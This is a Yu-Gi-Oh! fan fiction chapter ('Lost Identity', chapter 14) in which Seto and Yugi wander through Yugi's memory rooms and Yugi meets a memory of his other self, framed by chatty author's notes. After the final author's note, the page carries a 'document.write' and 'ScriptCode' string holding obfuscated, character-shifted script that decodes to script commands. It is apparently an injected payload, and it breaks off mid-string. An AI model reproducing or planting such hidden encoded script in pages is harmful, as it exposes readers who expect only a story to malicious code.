Yu-Gi-Oh! Fan Fiction ❯ Lost Identity ❯ Secrets and realizations inside of memories... ( Chapter 14 )

[ P - Pre-Teen ]

az: Okay... thanks for still supporting me... ideas kept smashing my face... I dunno how I can keep up. Even during classes, I kept thinking about the fics. And having a strange lecturer doesn't help. (Yeah, ppl can't barely understand what is it that he's talking about and laughed at his jokes that I don't even understand...) Anyway.... I'll keep on writing... till the end!!!


Disclaimer: I don't own Yugioh manga nor did I own the anime spare the DVDs and my DM deck that I so much treasure until the end of time. If I OWNED Yugioh... I'd be Kaiba's evil twin sister and my youngest sis would be Mokuba's clone...!! Huahahahahha!! Characters and original excerpts from the fic are copyrights of Kazuki Takahashi. And pardon me... I can't remember all the dialogues straight. So some scenes might be new....


Chapter 14: Secrets and realizations inside of memories...

Written by Azzie/Az @ Alienna Azuani

'Yugi....!!', shouted Seto as he approached another door. 'Where are you... damn it!!!', he shouted again as he fought to open the door in front of him. 'Stupid Yugi... stupid door!!', he said again as he kicked the door open. Lights shone over him as he blinked but then a scene of the past opened in front of him as he gasped in surprise.

'Take that!! Celtic guardian... attack!!', shouted Yami as Celtic Guardian dashed towards the paralyzed Ultimate Dragon. Anzu rushed immediately to try and stopped Yugi from attacking. Seto, who was watching the scene replaying in front of him was taken aback. 'This.... what's this?', he gasped as he heard Anzu shouting for Yugi to return to his original self. He stood dumbfounded as he watched Yami's eyes widen after hearing the statement.

But apart from seeing the events as he had seen it before, he saw something else. As the Celtic Guardian running towards Ultimate Dragon, Yugi's sennen item glowed to reveal the smaller Yugi. Yugi was holding his other half back!!

'Please stop it, mou hitori no boku!! ', cried Yugi as Yami stared at him in surprise. 'But aibou!! We've got to win!! Grandpa...'

'I DON'T WANT KAIBA TO DIE!!!!', cried Yugi as his other self hesitantly retreated into the puzzle as he couldn't stand seeing Yugi's anguished face. With that, Yugi collapsed to the ground.

'I can't do it!! I almost killed Kaiba with my own hand...', sobbed Yugi as Seto took this time to close the door.

The door clicked with a loud noise as Seto leaned towards the closed door. '...I'm sorry, Yugi. Sorry that I've hurt you that time by doing what I did...', hissed Seto regretfully as footsteps approached him from behind. 'Did you find him...?'

'No... Instead, I saw something dreadful...', whispered the lad as he walked towards the mages. 'That door...', cried Mana as Mahado nodded sadly. 'That was one of the most dreadful memories that pharaoh still had and also one that he still can't get over...'

Seto urged them to go on as he was anxious to leave that place and to find Yugi...

--

'He put this up in the morning. I think the reason is... he hides his true self because of other people...'

Yugi turned his attention immediately towards the source of the voice and saw his other self sitting together with Anzu inside. He walked slowly beside his old self and hugged him from behind. Though, no reaction came from Yami as if nothing had happened. 'This memory... I still had this memory...', whispered Yugi to himself as he chuckled over the memory that he made his other half act so stupid when he suddenly switched themselves. 'Even then, you knew about this... isn't it? That I've always put a mask of cheerfulness around everyone....', he sighed again as he remained, standing behind his own memory self..

'Yugi was worried about you...', said the memory Anzu as Yugi smirked. 'Anzu... you always had something to say, isn't it? But I wondered... when you said this. What was your feeling actually when you said this in front of my other self?'

'He's worried about me? He can't even figure up who he liked...'

Yugi edged a distance away from his memory self as he pondered over the statement. 'You were wrong...', he hissed as he glanced towards Anzu. 'I had always known this, but that before realizing that the person she liked was you...'

Yami continued talking. 'Like me, his road would be difficult...', said Yami as Anzu gasped, '...His road?' Yugi watched this exchange with interest. 'Both of us doesn't know who we really are and what our futures lay...'

'What...!?', gasped Yugi in surprise as suddenly everything around him vanished in the blackness of the dark. Yugi's eyes widen as he saw that everything around him was emptiness...

'He knew... Even if he had not expected it to turn out like now. My other self knew that both of us were tied to something by fate...', gasped Yugi in horror as he crouched by himself inside of the eternal void...

--

A doorknob of one of the memory rooms inside Yugi's soul chamber turned as the said door opened with difficulty. Someone came out of it as he stumbled back, closing the door behind him as he sat on the floor. His breath catched as he tried to overcome the fear and dread he had felt before of ever not coming out of that room...

'I thought I had died already... If I had not found the door, I could be trapped here forever....', gasped Yugi as he struggled to get up.

'Yugi!!! Where ARE you!!?'

Yugi gasped as he heard the voice and some other, echoing around him. 'Seto...? What's he doing here? And to think again... why am I here at the first place? All I know that I had strange visions when dad took my arms and then the next moment, I'm here. Oh heck... Seto!!! I'm here!!', croaked Yugi as he shouted for Kaiba. But his strength was waning after trying to get out from one of his memory room just now, and he felt drained after the effort.

Kaiba's voice rang again from afar as Yugi dizzily walked towards the source of the voice. Suddenly, Yugi's foot stumbled over something and he fell crashing into another memory door. So there he laid still, unconscious as he is...

--

'...Yugi!!?', cried Seto as he arrived on one of the corridors. 'I thought I heard his voice coming from here not long ago..', he whispered softly to himself. He glanced around him and saw that one of the doors had opened a little. Puzzled, he entered the room with the hope of finding the whereabouts of Yugi...

--

'It's time for my game. Ore no yami no GAME!!! '

The loathsome teen gasped in surprise. 'Yami no GAME ka!!? What the...?'

Yami ignored the teen as the sennen mark flashed over his forehead. 'You had cheated the game by your greed!! Now, accept the dark punishment!!', cried Yami as he punished the lad for his evil attention. Yugi watched in awe as he wondered about this memory. And unexpectedly, Yami turned towards him.

'What...? You can see me?', gasped Yugi as he edged away from him. Yami knelt over him and held his hands. 'Yes..', he said as he nodded his head. 'You wondered about this memory?', he said again as Yugi nodded. 'This was one of my memories when I first come to being, ever since you solved the puzzle. The ones that you can't remember. It happened that whenever you feel hurt, sad or angry, I will take over and punish those people that had to do with it. Because at the same time, I too was deeply hurt or angry to find you often being bullied. Are you mad... to finally find out about this?'

Yugi shook his head and hugged his other self. 'No. But I'm glad to have seen you again... after all that happen.'

'But I'm not really here. I'm just a memory of yourself. The real me... you already knew where he was...', said Yami as Yugi let go of him. 'I can't go on... unexpected things kept happening ever since that night at the museum. I'm not as strong as you to face this.' Yami shook him over as he forced Yugi to look at him. 'Aibou... look at me! You ARE strong!! Remember your old self... and me! I'm part of you and that also mean that you are as strong as me. Have faith in yourself!!'

Yugi stared towards Yami's scarlet eyes as he saw images of his old self and the other. He looked away as he started to accept the fact. 'You once said to me and I to you that we will never want to be apart from each other. That we will always be together and now we are!!'

'But I don't want it like this... even if we are in fact the same person. It won't feel the same anymore!!', cried Yugi. 'That feeling will pass... we still had our friends with us. And our old cousin... Seto, so things will turn out right!! Of course certainly, you hadn't forget Shimon and our family?', Yugi nodded obediently at him as he continued, '...It'll be alright, Atemu... my true self! You won't need the sennen powers anymore to protect you from harm. You can finally be your true self now!!'

Yami frowned a bit as he noticed Yugi's surprise at his mentioning his name. He then smiled at him. 'Finally I could say that name, isn't it? It's because we're finally become one. The pharaoh's... no, your lost memories can finally be retrieved. But, you'll find it out soon... they're waiting for you...', said Yami as he began to fade. 'No...', cried Yugi suddenly as he tried to reach out to his other half. But to no avail as the image vanished soon after the last words were said...

--

Yugi opened his eyes to find himself lying on the floor, but not alone. He sat up as Seto gave him a brief hug. 'I thought you would never wake up!! I was so worried, when I carried you out of that memory room and you did not show any signs that you were alive!!'

'I'm sorry that I worried you so much...'

'Don't bother... Anyway, your father was not going to harm you or anything so why be afraid? If I were you, I'll be excited to know that my father is still alive...'

Yugi stared at Seto in surprise. 'You've met him? And you felt nothing strange about him?!', he gasped as Seto gave him an impossible look. 'I did... I felt some familiar aura about your father and that's it!! Still, I won't want to discuss it now. So can we get back to the reality?', cried Kaiba as Yugi gave an apologetic look at him. And it so happened that Mahado and Mana came, finally able to find the two of them.

In no time, both lads returned to the present and without the presence of Yugi's father around. Yugi opened his eyes as he and Seto got up from their resting place. Yugi grinned at him. 'Sorry I bothered you too much, especially these few days. But then, why did you come here at the first place?'

Seto sighed to himself before answering. 'I had a bit of a fight with Mokuba, just that. So I thought I'd hang with you...'

Yugi rolled his eyes at him in disbelief. 'Just that? That's unnatural. Something else must have happened... you don't come to me every time you clashed with Mokuba.'

Seto pinched Yugi's ears hard. 'Don't push it...', drawled Seto. 'This was sensitive issue!!'

Yugi giggled softly. 'Okay... okay!! You won... I give up! I won't ask what was the thing between you and Mokuba!!' And Seto smirked over him as he towered over this bully-able friend of his...

[TBC]


az: Don't mind my silly words up there. Finally, this chapter was finished!! So don't pester me for the next!! At least, not yet! Review... and I might be able to update more next week... Bye!! document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs